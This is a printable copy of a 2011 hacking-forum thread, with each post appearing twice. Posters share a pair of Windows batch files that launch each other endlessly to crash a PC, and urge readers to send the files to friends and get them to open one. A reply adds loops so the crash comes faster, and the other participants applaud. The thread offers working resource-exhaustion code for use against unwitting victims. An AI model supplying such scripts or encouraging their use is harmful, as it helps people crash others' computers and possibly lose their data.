![]() |
|
[PRANK OR SERIOUS] Batch command - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Coding (https://sinister.ly/Forum-Coding) +--- Forum: Coding (https://sinister.ly/Forum-Coding--71) +--- Thread: [PRANK OR SERIOUS] Batch command (/Thread-PRANK-OR-SERIOUS-Batch-command) |
[PRANK OR SERIOUS] Batch command - Shadow Hunter - 03-11-2011 This is one of the simplest batch scripts ever i discovered it on my friend pc...guess wht happened after tht(u will figure out at the end of this topic) open a new notepad and type Code: start crash2.batsave it as crash1.bat open another new notepad and type Code: start crash1.batsave it as crash2.bat double clik either and they would open up simultaneously and continuously...and then it would crash ...after creating this send this file to one of ur friends and tell them to open either....guess u know the answer now
[PRANK OR SERIOUS] Batch command - Shadow Hunter - 03-11-2011 This is one of the simplest batch scripts ever i discovered it on my friend pc...guess wht happened after tht(u will figure out at the end of this topic) open a new notepad and type Code: start crash2.batsave it as crash1.bat open another new notepad and type Code: start crash1.batsave it as crash2.bat double clik either and they would open up simultaneously and continuously...and then it would crash ...after creating this send this file to one of ur friends and tell them to open either....guess u know the answer now
RE: [PRANK OR SERIOUS] Batch command - 1234hotmaster - 03-11-2011 hehe nice one the first will open the second and the second will open the first
RE: [PRANK OR SERIOUS] Batch command - 1234hotmaster - 03-11-2011 hehe nice one the first will open the second and the second will open the first
RE: [PRANK OR SERIOUS] Batch command - Shadow Hunter - 03-11-2011 yeah and finally it would crash the pc
RE: [PRANK OR SERIOUS] Batch command - Shadow Hunter - 03-11-2011 yeah and finally it would crash the pc
RE: [PRANK OR SERIOUS] Batch command - 1llusion - 03-11-2011 cool ![]() to improve it a bit you can add a loop: Code: :loop
start crash2.bat
goto loopCode: :loop
start crash1.bat
goto loopthen you will crash pc a lot faster
RE: [PRANK OR SERIOUS] Batch command - 1llusion - 03-11-2011 cool ![]() to improve it a bit you can add a loop: Code: :loop
start crash2.bat
goto loopCode: :loop
start crash1.bat
goto loopthen you will crash pc a lot faster
RE: [PRANK OR SERIOUS] Batch command - 1234hotmaster - 03-11-2011 lol 1lussion is right that will make it alot faster then the normal opening eachother
RE: [PRANK OR SERIOUS] Batch command - 1234hotmaster - 03-11-2011 lol 1lussion is right that will make it alot faster then the normal opening eachother
|